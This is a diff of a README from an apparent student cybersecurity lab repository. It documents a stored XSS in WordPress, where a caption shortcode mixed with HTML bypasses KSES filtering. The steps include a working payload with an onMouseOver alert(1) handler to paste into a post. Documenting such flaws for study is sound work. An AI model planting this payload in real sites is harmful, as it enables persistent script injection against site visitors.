arsheen/Codepath-CyberSecurity/README.md

 Steps:
 1. Intro - Shortcode tags can be mixed with HTML to lead to malformed HTML, bypassing KSES validation and opening up XSS.
 Can lead to persistant XSS.

-2. Enter the following code ina WP post:
+2. Enter the following code in a WP post:
 TEST!!![caption width="1" caption='<a href="' ">]</a><a href="http://onMouseOver='alert(1)'">Click me</a>

 3. View post to get XSS.